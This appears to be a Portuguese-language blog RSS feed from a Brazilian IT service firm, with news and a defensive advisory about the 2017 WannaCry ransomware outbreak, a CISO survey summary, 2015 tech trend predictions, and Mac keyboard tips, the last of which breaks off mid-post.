&lt;div&gt;&lt;span style=&quot;font-size: 19px;&quot;&gt;&lt;b&gt;Como foi o ataque?&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;

O golpe funciona da seguinte maneira, você recebe um e-mail que supostamente parece confiável, mas quando clica no anexo o computador passa automaticamente a ser infectado com o ransomware (WannaCrypt) e a partir deste momento todos os computadores que estão ligados a ele ficam infectados.&lt;br&gt;&lt;br&gt;

&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm9osl2W8oVFUZHddt15xJ0pBhGmZJf5gs9egQHPFMTjUxu-PmgvvCAGgSfK-dwahVlqO0zGykWt6k034Og_A-Qw4sU_wJqerZLYVWfeHPQZRzizQYqyF1c9M9GJPyuvIuY96FegjdajU/s1600/virus.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm9osl2W8oVFUZHddt15xJ0pBhGmZJf5gs9egQHPFMTjUxu-PmgvvCAGgSfK-dwahVlqO0zGykWt6k034Og_A-Qw4sU_wJqerZLYVWfeHPQZRzizQYqyF1c9M9GJPyuvIuY96FegjdajU/s640/virus.jpg&quot; width=&quot;610&quot; height=&quot;389&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;

Todos os seus dados e arquivos são criptografados, você passa a não ter mais acesso a eles. Então, logo após aparece uma mensagem na tela do seu computador dizendo que para voltar a ter acesso somente pagando o valor do “resgate” mínimo de US$ 300 dólares em moeda virtual Bitcoin, quase R$ 1.000 reais. Acredita-se que os hackers já tenham conseguido arrecadar em torno de US$ 80 mil dólares através dos pagamentos, através de contas bitcoin vinculadas ao código fonte.&lt;br&gt;&lt;br&gt;

&lt;div&gt;&lt;span style=&quot;font-size: 19px;&quot;&gt;&lt;b&gt;Como o ataque funciona?&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;

O vírus explora é uma falha gigantesca no sistema Windows, o mais utilizado no mundo. Segundo a Microsoft, o problema havia sido corrigido em março, a partir deste momento quem realizou a atualização do sistema estava protegido.&lt;br&gt;&lt;br&gt;

Mas como nem todas empresas, principalmente empresas de órgãos públicos não atualizam o sistema operacional com frequência, pelos altos custos que geram, ficando mais sucetíveis a ataques deste tipo.&lt;br&gt;&lt;br&gt;

&lt;div&gt;&lt;span style=&quot;font-size: 19px;&quot;&gt;&lt;b&gt;Quem foi prejudicado?&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;

O sistema de saúde britânico foi o primeiro a identificar o ataque, que atingiu desde o governo russo até ao sistema de entregas de encomendas americanas, assim como universidades na China e na Indonésia, sistema de trens da Alemanha, empresas de telecomunicações na Espanha e Portugal, a montadora francesa Renault teve que parar sua produção em algumas de suas unidades.&lt;br&gt;&lt;br&gt;

&lt;div&gt;&lt;span style=&quot;font-size: 19px;&quot;&gt;&lt;b&gt;Ataque no Brasil&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;

No Brasil, no estado do Rio de janeiro, todos os computadores do Instituto Nacional de Segurança Social (INSS) foram infectados pelo vírus passando a ser desligados. A Petrobras e a Telefônica também foram alvos do ataque.&lt;br&gt;&lt;br&gt;

O INSS, em nota, comunicou que todos os serviços das agências foram suspensos na sexta-feira (12) depois do anúncio de ciberataques na rede mundial de computadores. Segundo o órgão os atendimentos que foram marcados para a respectiva data serão reagendados ‘A Data de Entrada de Requerimento, DER, dos cidadãos agendados será resguardada”.&lt;br&gt;&lt;br&gt;

Páginas da Pevidência Social e do Ministério do Trabalho, além de outras páginas do governo federal, estavam fora do ar, assim como seus telefones sem atendimento.&lt;br&gt;&lt;br&gt;

&lt;div&gt;&lt;span style=&quot;font-size: 19px;&quot;&gt;&lt;b&gt;Investigações&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;

Segundo a polícia Europeia é necessária a realização de uma complexa investigação internacional para identificar quem está por trás do ataque. O que se sabe até o momento é quem desenvolveu a tecnologia utilizada pelo ataque foi o governo americano, através da Agência de Segurança Nacional (NSA).&lt;br&gt;&lt;br&gt;

A NSA produz as armas das guerras virtuais, vírus os quais atacam sistemas cibernéticos para realizar espionagens de governos e terroristas, por exemplo. Mas o sistema foi invadido por hackers no ano passado, momento em que conseguiram roubar várias dessas armas virtuais, sendo que uma delas foi usada para fazer o vírus que atacou o mundo na sexta-feira (12).&lt;br&gt;&lt;br&gt;

&lt;div&gt;&lt;span style=&quot;font-size: 19px;&quot;&gt;&lt;b&gt;Parou, mas não por muito tempo !!&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;

O jovem inglês conseguiu descobrir um gatilho que fez com que o ataque cessasse por um tempo, mas segundo ele, a qualquer momento os hackers podem descobrir o que ele conseguiu fazer e voltarem a atacar a qualquer instante.&lt;br&gt;&lt;br&gt;

Os especialistas no assunto sugerem que se atualize o sistema Windows e o sistema de antivírus no computador, e que posteriormente se faça a aquisição de um HD externo, uma memória que não está conectada a internet para guardar os arquivos e dados mais importantes, obtendo assim uma maior proteção.&lt;br&gt;&lt;br&gt;

&lt;div&gt;&lt;span style=&quot;font-size: 19px;&quot;&gt;&lt;b&gt;Consequências&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;

No Brasil, em São Paulo, na cidade do interior São José do Rio Preto, técnicos ainda estão trabalhando para tentar recuperar 55 máquinas do Ministério Público Estadual.&lt;br&gt;&lt;br&gt;

Já na capital de São Paulo, o Hospital Sírio Libanês teve o sistema de áreas administrativas comprometidas sendo recuperadas aos poucos, o que não veio a prejudicar o atendimento do hospital.&lt;br&gt;&lt;br&gt;

Em todo país mais de 14 estados e o Distrito Federal foram alvos dos ataques ou passaram a tomar ações preventivas para evitá-lo.&lt;br&gt;&lt;br&gt;

A Kaspersky Lab, fabricante russa de software de segurança cibernética, disse que seus pesquisadores observaram desde sexta-feira mais de 45.000 ataques em 74 países. Segundo a Avast, fabricante de software de segurança comunicou que identificaram 57.000 infecções em 99 países, sendo que Rússia, Taiwan e Ucrânia foram os principais alvos.&lt;br&gt;&lt;br&gt;

Já os hospitais e clínicas presentes no Reino Unido foram obrigadas a recusar pacientes porque tiveram seus computadores infectados pelo novo ransomware que se espalhou de forma muito rápida pelo mundo misturando todos os dados dos pacientes, exigindo para desfazer a bagunça o pagamento de US$ 600 dólares.&lt;br&gt;&lt;br&gt;

Ainda a maior empresa de entregas do mundo, a FedEx Corp, está entre as companhias que obtiveram o sistema Windows da Microsoft Corp afetados.&lt;br&gt;&lt;br&gt;

Segundo o engenheiro de segurança da Norton, Nelson Barbosa, “ eles sabiam que através do sistema operacional Windows, o mais utilizado pelo mundo todo, seria possível atingir o maior número de pessoas e obter consequentemente um maior lucro”.&lt;br&gt;&lt;br&gt;

Ataques cibernéticos geralmente possuem apenas um alvo, mas desta vez o objetivo foi infectar o maior número possível de computadores para ganhar muito dinheiro através da solicitação de resgate para cada máquina atingida para liberar o acesso do usuário.&lt;br&gt;&lt;br&gt;

A forma realizada para o pagamento foi a moeda digital Bitcoin, que ninguém carrega na carteira, facilitando a ação dos criminosos pois não há nenhuma organização que controle as realizações com a moeda virtual.&lt;br&gt;&lt;br&gt;

Para Fernando Marcondes, economista, “nossa evolução é digital, as facilidades são digitais, mas é uma pena que estejam sendo usadas mais para o mau do que para o bem, pela falta de regulamentação”.&lt;br&gt;&lt;br&gt;

&lt;div&gt;&lt;span style=&quot;font-size: 19px;&quot;&gt;Compartilhe essa notícia com seus amigos, ajude a propagar esta informação para evitar novos ataques.&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2017/05/ataque-atinge-computadores-de-99-paises_16.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm9osl2W8oVFUZHddt15xJ0pBhGmZJf5gs9egQHPFMTjUxu-PmgvvCAGgSfK-dwahVlqO0zGykWt6k034Og_A-Qw4sU_wJqerZLYVWfeHPQZRzizQYqyF1c9M9GJPyuvIuY96FegjdajU/s72-c/virus.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-8950442529185117820</guid><pubDate>Tue, 16 May 2017 15:13:00 +0000</pubDate><atom:updated>2017-05-16T12:13:15.511-03:00</atom:updated><title>Ataque atinge computadores de 99 países e hackers arrecadam o equivalente a 80 mil dólares</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;
Na última sexta-feira, 12 de maio, um ataque massivo de ransomware afetou diversas organizações na Europa e América Latina. Esse tipo de ataque afeta sistemas Windows cifrando diversos arquivos em discos rígidos, pendrives e unidades de rede podendo, assim, se propagar a outros equipamentos que estejam conectados na mesma rede.

Descrição:

O ransomware, conhecido pelas variantes de WannaCry ou HydraCrypt, infecta computadores utilizando o sistema operacional Microsoft Windows através de uma vulnerabilidade no serviço SMB, utilizado para o compartilhamento de arquivos via rede.

Quando o usuário executa um arquivo malicioso enviado pelo atacante, normalmente um arquivo compactado do tipo RAR, inicia-se um processo de cifragem de arquivos no computador da vítima. Além disso, conforme dito anteriormente, o ransomware pode propagar-se através da rede local. Isto é, outras máquinas, que executem o mesmo sistema operacional, podem ser afetadas.

Quando o computador é afetado, os arquivos cifrados passam a ser identificados pela extensão &quot;.wcry&quot;. Após este processo, é solicitada à vítima o pagamento de uma taxa para envio da chave que poderá decifrar os dados. Porém, de acordo com relatos conhecidos, o pagamento da taxa de resgate ao usuário malicioso não garante que o mesmo irá enviar a chave para decifrar os arquivos, o que torna importante realizar regularmente o backup dos arquivos para recuperação quando necessário.

Por distração ou falta de conhecimento, muitos de nossos usuários têm o hábito de abrir mensagens recebidas que jamais foram solicitadas, como por exemplo, recadastramento de senhas de banco ou dados pessoais. Esses falsos correios eletrônicos costumam conter textos que os convidam a baixar anexos comprometidos ou ainda clicar em links desconhecidos.

Recomendamos, também, a todos os administradores de redes e sistemas que verifiquem a integridade das cópias de segurança dos arquivos da sua responsabilidade, assim como suas rotinas de backup.

Não abram mensagens e arquivos suspeitos, nem cliquem em links desconhecidos!

Sistemas impactados:
Windows Vista SP2
Windows Server 2008
Windows Server 2008 R2
Windows 7
Windows 8.1
Windows Server 2012
Windows Server 2012 R2
Windows 10
Windows Server 2016
É recomendada a aplicação URGENTE das correções disponíveis para os sistemas vulneráveis!

Correções disponíveis:

- Aplicar as correções de segurança recomendadas no link abaixo:
www.catalog.update.microsoft.com/

Ações recomendadas:
• Aplicar as correções de segurança para o seu sistema operacional.
• Atualizar as soluções de antimalware para suas últimas versões disponibilizadas pelos desenvolvedores.
• Realizar cópias de segurança de arquivos e sistemas e aplicar medidas para assegurar sua integridade e funcionamento.
A Computers Service Informática recomenda que os administradores e usuários mantenham seus sistemas e aplicativos sempre atualizados, de acordo com as últimas versões e correções oferecidas pelos fabricantes.
A segurança é um dever de todos. Para garantir o bom funcionamento da nossa infraestrutura de dados, fiquem atentos às boas práticas! (https://cartilha.cert.br/)&lt;/div&gt;&lt;br&gt;
Mais informações:&lt;br&gt;
1-  www.techtudo.com.br/noticias/noticia/2016/06/o-que-e-ransomware.html&lt;br&gt;
2- www.rnp.br/sites/default/files/vulnerabilidade_servico_smbv1_da_microsoft.pdf&lt;br&gt;
3- www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt&lt;br&gt;
4- https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks&lt;br&gt;
5- https://support.microsoft..com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3&lt;br&gt;
6- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147&lt;br&gt;
7- https://technet.microsoft.com/en-us/library/security/ms17-010.aspx&lt;br&gt;
8- www.virustotal.com/en/file/&lt;br&gt;
9- https://intel.malwaretech.com/WannaCrypt.html&lt;br&gt;
10- www.hybrid-analysis.com/sample/&lt;br&gt;
11- www..theguardian.com/society/2017/may/12/hospitals-across-england-hit-by-large-scale-cyber-attack&lt;br&gt;
12- https://cartilha..cert.br/&lt;/br&gt;
</description><link>http://computersservicetecnica.blogspot.com/2017/05/ataque-atinge-computadores-de-99-paises.html</link><author>noreply@blogger.com (Computers Service Informática)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-8079138852492205205</guid><pubDate>Sat, 27 Dec 2014 01:13:00 +0000</pubDate><atom:updated>2014-12-26T23:13:32.089-02:00</atom:updated><title>Maioria das empresas não está preparada para o cibercrime</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXz-LQLTxEOPx_LBiF7jBEvz5MlShSVDuqp9A236czXH2viSnqN5S96R8eD5FFcgiDjIjxOUadem2ss4jhu-n8xNUk6POJtqKNuz2tIgwt-L1lRlJwT16roaY43whH4Xr_qsfncueyE7Y/s1600/furto.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXz-LQLTxEOPx_LBiF7jBEvz5MlShSVDuqp9A236czXH2viSnqN5S96R8eD5FFcgiDjIjxOUadem2ss4jhu-n8xNUk6POJtqKNuz2tIgwt-L1lRlJwT16roaY43whH4Xr_qsfncueyE7Y/s1600/furto.jpg&quot; height=&quot;202&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;Embora mais de 80% dos líderes de segurança digital do mercado 
compreendam que as ameaças externas estejam em ascensão, 60% deles 
admitem que suas empresas não estão totalmente prontas para enfrentar 
esse desafio.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
São as conclusões do terceiro estudo com CISOs realizado pelo IBM Center
 for Applied Insights com quase 140 executivos. 40% deles consideram as 
ameaças externas o principal desafio de segurança e pretendem melhorar 
os esforços num prazo entre três e cinco anos.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Além disso, a regulamentação do setor é apontada como preocupante para 
15% dos CISOs. 80% deles entendem que o risco potencial envolvendo 
regulamentações e padrões tem aumentado nos últimos três anos, eles não 
estão seguros sobre como governos lidarão com a segurança, seja em nível
 nacional ou global.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span id=&quot;docs-internal-guid-e6be69f7-7379-1603-0881-31e8bb4347c1&quot;&gt;Para 
se ter uma ideia, apenas 22% dos líderes acreditam que haverá uma 
abordagem global organizada sobre o combate ao cibercrime - outra vez, 
daqui a três ou cinco anos.&lt;/span&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2014/12/maioria-das-empresas-nao-esta-preparada.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXz-LQLTxEOPx_LBiF7jBEvz5MlShSVDuqp9A236czXH2viSnqN5S96R8eD5FFcgiDjIjxOUadem2ss4jhu-n8xNUk6POJtqKNuz2tIgwt-L1lRlJwT16roaY43whH4Xr_qsfncueyE7Y/s72-c/furto.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-1191215157591458721</guid><pubDate>Sat, 27 Dec 2014 01:03:00 +0000</pubDate><atom:updated>2014-12-26T23:03:59.003-02:00</atom:updated><title>6 tendências para ficar de olho em 2015</title><description>&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 19px;&quot;&gt;Com o ano se aproximando do fim, especialistas em tecnologia fazem suas 
apostas para as áreas que terão destaque nos próximos anos. O Mashable listou seis tendências para prestar atenção no ano que vem e o que deve acontecer em cada uma delas. Confira:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfnXVfO1CEmNo1a-LbIEl4iqHRCGe9nxCrxWuKEH7LgQy66Au1JYOqbr-HiVRHkUzeLHb_3HpVgsrM40_5IRvcGd44uovaPK13duSxyTprraDAtOQG99NEr8vdcpQyGVrhuSfBy4N8kzY/s1600/mundo_atual.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfnXVfO1CEmNo1a-LbIEl4iqHRCGe9nxCrxWuKEH7LgQy66Au1JYOqbr-HiVRHkUzeLHb_3HpVgsrM40_5IRvcGd44uovaPK13duSxyTprraDAtOQG99NEr8vdcpQyGVrhuSfBy4N8kzY/s1600/mundo_atual.jpg&quot; height=&quot;398&quot; width=&quot;620&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;b&gt;1.Big Data&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Como já citamos, a análise de dados e o processamento de números em 
grande quantidade será uma das apostas para o ano que vem. Estima-se que
 o mundo gere 10 exabytes de dados a cada dois dias. Em 2015 empresas 
como Intel e IBM vão transformar todos eles em ferramentas poderosas 
para tomada de decisão.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Em vez de decidir com base em um amplo entendimento das tendências do 
mercado, os interesses dos clientes e sua intuição, as empresas dependem
 cada vez mais números concretos para impulsionar novos produtos e 
serviços.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;2.Inteligência Artificial&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Uma indústria de software e hardware que pode aprender e pensar como os 
humanos está cada vez mais próxima. Em 2015, preste muita atenção no 
trabalho de Demis Hassabis, criador da Deep Mind, uma startup recém 
adquirida pelo Google que está utilizando a inteligência artificial para
 recriar os neurônios humanos.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;3. Robôs&lt;/b&gt; &lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTzf5aGuT0f3dcS_2zO2jLFKYzPGIEdSAzSncuUSwW-jsDBii12M_uIzQobbznEhRIIUOGmlRxrqFQlVQgDPTysQO4ICj-MzkfAtOGuWQNuQoIWyZJ-v1zWgHQMAzcdQj4d88IOPTQBY8/s1600/robos.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTzf5aGuT0f3dcS_2zO2jLFKYzPGIEdSAzSncuUSwW-jsDBii12M_uIzQobbznEhRIIUOGmlRxrqFQlVQgDPTysQO4ICj-MzkfAtOGuWQNuQoIWyZJ-v1zWgHQMAzcdQj4d88IOPTQBY8/s1600/robos.jpg&quot; height=&quot;203&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Robôs que trabalham em conjunto com humanos estarão cada vez mais 
próximos. Além de trabalhar nas fábricas, as máquinas poderão ser 
encontradas também nos lares, ajudando a realizar tarefas domésticas. 
Ainda que não seja um ano com grandes avanços na área, especialistas 
indicam que as melhorias na manipulação e locomoção poderão contribuir 
para a popularização desses dispositivos.&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIrm0u1AEZIGK55EDMBunIXuEIH0L5qUvmckXLMf2RGCDkBLZoW8cQoBw3h1WeMxfvXMKkwXC0amaINoz-nBCwVp56xu2hoebkpMhEFJl7fqtK4PK183I5kyUgBB8ucAv5f5oN-7akw8Q/s1600/nano.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIrm0u1AEZIGK55EDMBunIXuEIH0L5qUvmckXLMf2RGCDkBLZoW8cQoBw3h1WeMxfvXMKkwXC0amaINoz-nBCwVp56xu2hoebkpMhEFJl7fqtK4PK183I5kyUgBB8ucAv5f5oN-7akw8Q/s1600/nano.jpg&quot; height=&quot;203&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;b&gt;4. Nanotecnologia&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
2014 foi um ano de grandes descobertas no campo da nanotecnologia, como a
 possibilidade de oferecer um medicamento capaz de destruir o câncer em 
nível molecular e capsulas de remédio implantadas como adesivos para 
distribuir doses exatas de medicamentos. Para o ano que vem é possível 
que algumas dessas novidades já estejam disponíveis no mercado.&lt;b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;b&gt;&lt;b&gt;5. Baterias melhores e carregadores sem fio&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
No início deste ano o Instituto Nacional de Padrões e Tecnologia dos 
Estados Unidos informou que seus cientistas estão desenvolvendo baterias
 com base em um complexo de hidreto metálico à base de sódio. A 
descoberta poderia ajudar a produzir baterias mais baratas, estáveis e 
poderosas. Carregadores sem fio já existem, mas são uma grande aposta 
para 2015 e devem se tornar bastante comuns.&lt;b&gt;&lt;b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;b&gt;&lt;b&gt;&lt;b&gt;6. Telas flexíveis&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
As telas curvas já são realidade, mas devem ficar mais baratas no ano 
que vem. Além das TVs, elas estarão presentes em dispositivos móveis 
como smartphones e tablets.&lt;b&gt;&lt;b&gt;&lt;b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&amp;nbsp;&lt;/b&gt;&amp;nbsp;&lt;/b&gt;&amp;nbsp;&amp;nbsp; &lt;/b&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2014/12/6-tendencias-para-ficar-de-olho-em-2015.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfnXVfO1CEmNo1a-LbIEl4iqHRCGe9nxCrxWuKEH7LgQy66Au1JYOqbr-HiVRHkUzeLHb_3HpVgsrM40_5IRvcGd44uovaPK13duSxyTprraDAtOQG99NEr8vdcpQyGVrhuSfBy4N8kzY/s72-c/mundo_atual.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-8197079907462822642</guid><pubDate>Sat, 27 Dec 2014 00:50:00 +0000</pubDate><atom:updated>2014-12-26T22:53:52.107-02:00</atom:updated><title>10 truques escondidos no Mac</title><description>&lt;div style=&quot;text-align: center;&quot;&gt;
Alguns recursos escondidos do Mac podem facilitar a vida dos usuários e 
tornar a experiência de utilização mais fácil. Confira 10 dicas que 
podem ajudar a poupar o tempo dos usuários:&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpo3t-keBYPFGpWF_nG_UBAWEOaHpOBUpo4GNClQ1XGA_zkKTIK9QhJuiXTNOF_GklORaL0RDkQWVPncQZnKz0xglJY-NciNXa_vguy_4K_dprJk445T7Yh0SWKel-SSHk5b4vQ5Mtme8/s1600/apple.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpo3t-keBYPFGpWF_nG_UBAWEOaHpOBUpo4GNClQ1XGA_zkKTIK9QhJuiXTNOF_GklORaL0RDkQWVPncQZnKz0xglJY-NciNXa_vguy_4K_dprJk445T7Yh0SWKel-SSHk5b4vQ5Mtme8/s1600/apple.jpg&quot; height=&quot;400&quot; width=&quot;600&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;b&gt;1. Screenshots na medida certa&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Para capturar um espaço determinado da tela clique em Command + Shift + 
4. O cursor vai se transformar em uma caixa de seleção. basta selecionar
 o que quer que seja mostrado na imagem e soltar o clique do mouse.h&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;2. Esconda o dock&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Pressione Command + Option + D irá para esconder o dock. Para trazê-lo de volta basta repetir os comandos.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;3. Inverta as cores da tela&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Clique em Command + Option + Control + 8 para trocar as cores da tela. 
Esse recurso foi originalmente projetado para ajudar pessoas com 
dificuldades visuais.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;4. Alterne entre os aplicativos&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Para se livrar de muitos aplicativos em execução, mantenha a tecla 
Command pressionada e clique em Tab para alternar entre as aplicações. 
Toque em Q para sair qualquer um dos aplicativos ou em H para minimizar.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;5. Exibir todas as informações de formulários&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
